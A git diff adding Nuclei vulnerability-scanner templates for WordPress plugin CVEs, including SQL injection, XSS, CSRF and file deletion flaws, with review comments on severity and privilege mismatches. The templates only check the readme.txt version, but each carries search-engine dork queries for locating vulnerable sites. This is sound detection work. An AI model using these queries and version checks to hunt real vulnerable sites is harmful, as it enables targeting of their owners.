+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-11429
+ metadata:
+ fofa-query: "wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+ google-query: inurl:"/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+ shodan-query: 'vuln:CVE-2024-11429'
+ tags: cve,wordpress,wp-plugin,stars-testimonials-with-slider-and-masonry-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "stars-testimonials-with-slider-and-masonry-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml b/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
new file mode 100644
index 0000000000..0d113c79a7
--- /dev/null
+++ b/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11444
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:CVE-2024-11444'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml b/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
new file mode 100644
index 0000000000..07e13f5eb2
--- /dev/null
+++ b/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11450-aa0eea523b63076daf425f6ddb400979
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11450
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:CVE-2024-11450'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml b/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
new file mode 100644
index 0000000000..9adc1bc373
--- /dev/null
+++ b/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f
+
+info:
+ name: >
+ Verowa Connect <= 3.0.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Verowa Connect plugin for WordPress is vulnerable to SQL Injection via the 'search_string' parameter in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11460
+ metadata:
+ fofa-query: "wp-content/plugins/verowa-connect/"
+ google-query: inurl:"/wp-content/plugins/verowa-connect/"
+ shodan-query: 'vuln:CVE-2024-11460'
+ tags: cve,wordpress,wp-plugin,verowa-connect,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/verowa-connect/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "verowa-connect"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml b/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
new file mode 100644
index 0000000000..51b2ff7c90
--- /dev/null
+++ b/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf
+
+info:
+ name: >
+ WP Hide & Security Enhancer <= 2.5.1 - Missing Authorization to Unauthenticated Arbitrary File Contents Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The WP Hide & Security Enhancer plugin for WordPress is vulnerable to arbitrary file contents deletion due to a missing authorization and insufficient file path validation in the file-process.php in all versions up to, and including, 2.5.1. This makes it possible for unauthenticated attackers to delete the contents of arbitrary files on the server, which can break the site or lead to data loss.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11585
+ metadata:
+ fofa-query: "wp-content/plugins/wp-hide-security-enhancer/"
+ google-query: inurl:"/wp-content/plugins/wp-hide-security-enhancer/"
+ shodan-query: 'vuln:CVE-2024-11585'
+ tags: cve,wordpress,wp-plugin,wp-hide-security-enhancer,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-hide-security-enhancer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml b/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
new file mode 100644
index 0000000000..355fc0aedd
--- /dev/null
+++ b/poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6
+
+info:
+ name: >
+ Next-Cart Store to WooCommerce Migration <= 3.9.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/abcebcdb-e22a-4b6c-86db-f95b00260446?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11687
+ metadata:
+ fofa-query: "wp-content/plugins/nextcart-woocommerce-migration/"
+ google-query: inurl:"/wp-content/plugins/nextcart-woocommerce-migration/"
+ shodan-query: 'vuln:CVE-2024-11687'
+ tags: cve,wordpress,wp-plugin,nextcart-woocommerce-migration,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nextcart-woocommerce-migration/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nextcart-woocommerce-migration"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.9.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml b/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
new file mode 100644
index 0000000000..c7755d3077
--- /dev/null
+++ b/poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11728
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11728'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml b/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
new file mode 100644
index 0000000000..07eeacc89a
--- /dev/null
+++ b/poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11729-fc3745f8e039decbc81308be45aacd79
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Subscriber+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'service_list[0][service_id]' parameter of the get_widget_payment_options AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/86632212-37b5-4280-8a2a-163957ad9787?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-11729
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11729'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
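Review bot: The `name` says "Authenticated (Subscriber+)" while the `description` says attackers need "Custom-level access and above", so the required privilege is stated two different ways in one template. Whichever role the Wordfence advisory listed under `reference` gives should appear in both fields, since triage of an authenticated SQL injection depends on who can reach it. This template also sends the same readme.txt request and the same `<= 3.6.4` comparison as CVE-2024-11728 and CVE-2024-11730, so one KiviCare install in range produces three findings that differ only in metadata.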
diff --git a/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml b/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
new file mode 100644
index 0000000000..3f957bd372
--- /dev/null
+++ b/poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Doctor/Receptionist+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'sort[]' parameter of the static_data_list AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with doctor/receptionist-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-11730
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11730'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
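Review bot: `severity: low` and the trailing `low` tag do not agree with `cvss-score: 6.5` in the same `classification` block, which sits in the CVSS 3.1 medium band (4.0–6.9), so a scan filtered on severity will under-rank this SQL injection. I would change them to `severity: medium` and `tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,medium`. The same low-versus-medium mismatch is in the new templates for CVE-2024-11779, CVE-2024-11823, CVE-2024-12027, CVE-2024-12110, CVE-2024-39626, CVE-2024-4271, CVE-2024-4633, CVE-2024-49232, CVE-2024-49665 and CVE-2024-52436 (scores 4.3 to 6.4). If the label comes from the upstream generator's own mapping, that mapping should be documented in the repository rather than left to contradict the score.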
diff --git a/poc/cve/CVE-2024-11779.yaml b/poc/cve/CVE-2024-11779.yaml
new file mode 100644
index 0000000000..d6a26681ed
--- /dev/null
+++ b/poc/cve/CVE-2024-11779.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11779
+
+info:
+ name: >
+ WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WIP WooCarousel Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wip_woocarousel_products_carousel' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11779
+ metadata:
+ fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+ google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+ shodan-query: 'vuln:CVE-2024-11779'
+ tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wip-woocarousel-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
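Review bot: The three matchers only establish that `readme.txt` is served and that its `Stable tag` is at or below 1.1.6; nothing in the template touches the `wip_woocarousel_products_carousel` shortcode, so a hit is an inventory finding rather than a confirmed vulnerability. The readme value may also differ from the code actually running (a site can keep a stale readme or block the file), which would give both false positives and false negatives. I would state that in the template with a comment above `http:` such as `# Version check only: reads "Stable tag" from readme.txt; does not confirm the flaw is reachable.` The other templates added in this commit use the same request and matchers and would take the same comment.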
diff --git a/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml b/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
new file mode 100644
index 0000000000..acfed4a378
--- /dev/null
+++ b/poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11823
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:CVE-2024-11823'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
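Review bot: The title and description require an authenticated Contributor, but `cvss-metrics` carries `PR:N/UI:R` with `cvss-score: 6.1`, which describes an unauthenticated attack that needs user interaction. The other Contributor+ stored-XSS templates in this commit (CVE-2024-11779, CVE-2024-49232, CVE-2024-49665) use `PR:L/UI:N` and 6.4, so one of the two fields here is probably wrong in the upstream data. Check the linked Wordfence advisory and, until that is settled, add `# cvss-metrics disagrees with the Contributor+ requirement in the name; verify against the advisory` above `classification:`.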
diff --git a/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml b/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
new file mode 100644
index 0000000000..ea24cc9add
--- /dev/null
+++ b/poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12003-f77c04413b23540455a2432d7e006cc4
+
+info:
+ name: >
+ WP System <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the generate_wp_system_page_content() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12003
+ metadata:
+ fofa-query: "wp-content/plugins/wp-system/"
+ google-query: inurl:"/wp-content/plugins/wp-system/"
+ shodan-query: 'vuln:CVE-2024-12003'
+ tags: cve,wordpress,wp-plugin,wp-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml b/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
new file mode 100644
index 0000000000..d5378f4e66
--- /dev/null
+++ b/poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6
+
+info:
+ name: >
+ Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) Filter Updates/Deletions
+ author: topscoder
+ severity: low
+ description: >
+ The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the updateFilter() and deleteFilter() functions in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update and delete filters.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12027
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-message-filter/"
+ google-query: inurl:"/wp-content/plugins/cf7-message-filter/"
+ shodan-query: 'vuln:CVE-2024-12027'
+ tags: cve,wordpress,wp-plugin,cf7-message-filter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-message-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.3')
\ No newline at end of file
